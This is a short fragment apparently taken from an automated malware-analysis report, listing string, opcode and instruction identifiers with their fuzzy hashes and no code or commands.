                                                                      • String ID: 4']q$4']q$$]q$$]q
                                                                      • API String ID: 0-978391646
                                                                      • Opcode ID: 86148e10d846892e9e386e0db51f2527dbd5f15270e4eff423a041b113974ac6
                                                                      • Instruction ID: 17d35171d10786d4d22c7237ffdd52a8fc689eac2877f98a40c99358149b6692
                                                                      • Opcode Fuzzy Hash: 86148e10d846892e9e386e0db51f2527dbd5f15270e4eff423a041b113974ac6
                                                                      • Instruction Fuzzy Hash: D501B16174D3C68FC72B576C6D201946FB25F8B69071A49EFC480CF2A7CA148C49C3A7